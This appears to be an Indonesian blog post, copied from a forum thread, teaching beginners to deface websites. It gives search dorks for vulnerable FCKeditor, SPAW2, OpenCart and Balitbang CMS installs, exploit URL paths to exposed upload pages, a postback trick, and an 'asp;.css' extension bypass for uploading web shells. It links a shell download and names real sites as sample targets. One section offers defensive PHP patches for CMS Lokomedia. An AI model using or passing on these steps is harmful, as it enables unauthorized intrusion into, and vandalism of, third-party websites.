Cara Deface Website Untuk Newbie

Cara Deface Website Untuk Newbie

Oke saya mulai aja cara deface website yang paling mudah untuk para pemula seperti saya tuk yang sudah master mohon bimbingannya.


Cara 1 Deface menggunakan ASPX
DORK :
inurl:Fck/fcklinkgallery.aspx
atau
/portals/0/
inurl:tabid/176/Default.aspx

pilih salah satu dork nya,,

kalau sudah ketemu targetnya tambahkan ini "providers/htmleditorproviders/fck/fcklinkgallery.aspx

disini saya menggunakan dork inurl:Fck/fcklinkgallery.aspx dan target http://www.pivocom.com/sebagai contohnya..

sehingga akan menjadi seperti ini :
"http://www.pivocom.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx"

setelah klik itu, tunggu loading selesai baru kamu harus klik
"(File A file on your site)
dan ganti alamat protocol website nya jadi :
"javascript:__doPostBack('ctlURL$cmdUpload','' )" => [ tanpa tanda kutip 2 ]

nanti keluar sendiri, tombol browsenya seperti ini.

Cara Deface Website Untuk Newbie

kalau sudah upload file yang ingin kamu masukan,,
file yang bisa di upload antara lain:

*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,
klo gk punya shell nya download aja di sini http://www.media*fire..com/?zqvx2ajbyc4b17j
tapi tidak semua web yang bisa upload file .html,
ada beberapa situs yang hanya bisa upload file .txt

sebelum upload ubah ekstensi nya menjadi css
misal : hacker.asp;.css ingat ! kita harus menambahkan titiknya dua kali [contohnamashell(.)asp(.)css] sehingga berakhiran ".asp;.css" misal : "hacker.asp;.css"

upload, lalu kita buka hasil defacenya.
kita lihat dulu tadi nama file yang kita upload apa
misal : "hacker.asp;.css" kita buka alamat protocol nya
caranya : ' kan tadi alamat nya "http://www.pivocom.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx" [ dengan catatan setelah kita berhasil/ selesai upload ]

Setelah itu kamu ganti alamat "http://www.pivocom.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx" menjadi alamat halaman defaced kita menjadi http://www.pivocom.com/portals/0/pajenk.asp;.css intinya kita harus menambahkan "portals/0/" pada akhir http://www.pivocom.com/



Cara 2 Deface web dengan SPAW Vulnerably
DORK
inurl:spaw2/dialogs/ atau
inurl:spaw2/uploads/files/

POC
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2 &lang=es&charset=&scid=cf73b58bb51c52235494da752d9 8cac9
jika sudah menemukan targetnya contoh seperti ini :
http://olgabz.com/spaw2/dialogs/

lalu kamu ganti spaw2/dialogs/"
dengan
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2 &lang=es&charset=&scid=cf73b58bb51c52235494da752d9 8cac9

jadinya seperti ini http://olgabz.com/spaw2/dialogs/dial...a752d9%208cac9

nanti akan muncul SPAW File Manager, lihat gambar di bawah ini :

Cara Deface Website Untuk Newbie
Jangan lupa ganti typenya dari image ke File, dan kamu tinggal upload file kamu.
Selesai

Lalu kamu lihat file kamu sudah masuk blom seperti gambar di bawah ini:

Cara Deface Website Untuk Newbie
Lalu bagaimana cara melihat hasil deface kita?
caranya, kamu klik file yang sudah kamu upload, nanti akan ada tulisan download file di sebelah kanan,,dan kamu klik, maka hasil file deface kamu akan keluar seperti ini.

ini hasilnya http://olgabz.com/spaw2/uploads/files/pajenk.html

Selesai sudah defacenya, gampang kan.



Cara 3 Deface Dengan Metode Opencart
Maaf ini khusus buat newbie yang ingin belajar, kalau udah master mohon bimbingannya.
seperti biasa nyarinya lewat paman google

dork nya :
SUPORT BY OPENCART
atau
Powered By OpenCart site:com (sitenya bisa kamu ganti,seperti my,il, dll yang penting suport opencart)
kalau ingin semuanya, sitenya hilangkan menjadi Powered By OpenCart

langsung ke caranya
jika kamu sudah mendapatkan target nya

contoh target http://www.digitalbazzar.co.uk/shop bisa juga www.digitalbazzar.co.uk/cart,
www.digitalbazzar.co.uk/patch dll

kalau sudah dapat targetnya tinggal kita inject exploitnya
admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

jadinya seperti ini http://www.digitalbazzar.co.uk/shop/...tors/test.html
kalau ketemu yang seperti ini http://digitalbazzar.co.uk/shop/ kamu inject di blakang /shop/ nya.


maka akan muncul tampilan seperti ini.

Cara Deface Website Untuk Newbie
Jangan lupa connectornya diganti menjadi PHP.
lalu kamu masukin file deface kamu, jika berhasil maka ada bacaan alert seperti ini "file uploaded with no errors"

untuk melihat apakan berhasil di upload atau tidak kamu ke "Get Folders and Files" dan lihat hasilnya.

Jika berhasil kamu tinggal masukin nama file deface kamu di blakang site nya, maka hasilnya seperti ini.
http://www.digitalbazzar.co.uk/



Cara 4 Patch Bug CMS Lokomedia
Contoh lihat
DORK=
inurl:"admin/foto_berita/"
inurl:"media.php?module="
allinurl:/media.php?module=berita


pilih salah satu aja.

path :
/admin/content.php?module=user

PATCH
untuk memperbaiki bugs pada CMS Lokomedia bisa dengan memberikan Patch pada file /admin/content.php
dengan menambahkan penggalan kode berikut :


session_start();
if (empty($_SESSION[namauser]) AND empty($_SESSION[passuser])){
echo "Maaf anda tidak berhak menjalankan modul ini";
}
else{
.....Statement
}





Menambahkan penggalan kode yang sama di file /admin/aksi.php

session_start();
if (empty($_SESSION[namauser]) AND empty($_SESSION[passuser])){
echo "Maaf anda tidak berhak menjalankan modul ini";
}
else{
.....Statement
}

menyaring file yang akan di upload kode pada file aksi.php saat mengedit berita dengan penggalan kode berikut:


if ($tipe_file != "image/jpeg" AND $tipe_file != "image/pjpeg"){
echo "Gagal menyimpan data !!!
Tipe file $nama_file : $tipe_file
Tipe file yang diperbolehkan adalah : JPG/JPEG.
";
echo "Ulangi Lagi"; 
}
else{
.....statement

sumber

buku Jalan Pintas Menjadi Master PHP karangan Lukmanul Hakim.



Cara 5 CMS Balitbang 3.42
Hasilnya.
http://smpn4pakem.sch.id//userfiles/pajenk.txt

dorknya

Code:


inurl:/html/siswa.php?

inurl:/html/alumni.php?

inurl:/html/guru.php?


Exploit :

Code:


http://public_html/dir/editor/filemanager/connectors/uploadtest.html

http://public_html/dir/editor/filemanager/connectors/test.html

http://public_html/dir/editor/filemanager/browser/default/browser.html

pilih salah satu aja.
kalau sudah memilih target masukin exploitnya
contoh :

Code:
 http://smpn4pakem.sch.id/editor/filemanager/connectors/uploadtest.html


lalu pilih connector nya dari ASP --> PHP,,tinggal masukin filenya kalian tapi harus berbentuk .TXT .


Hanya itu saja yang dapat saya bahas semoga bermanfaat. Terima kasih


sumber: http://www.kaskus.co.id/thread/000000000000000008176398/1769176917691769-cara-deface-website-for-newbie-1769176917691769/
Share 'Cara Deface Website Untuk Newbie' On ...

1 Komentar untuk "Cara Deface Website Untuk Newbie"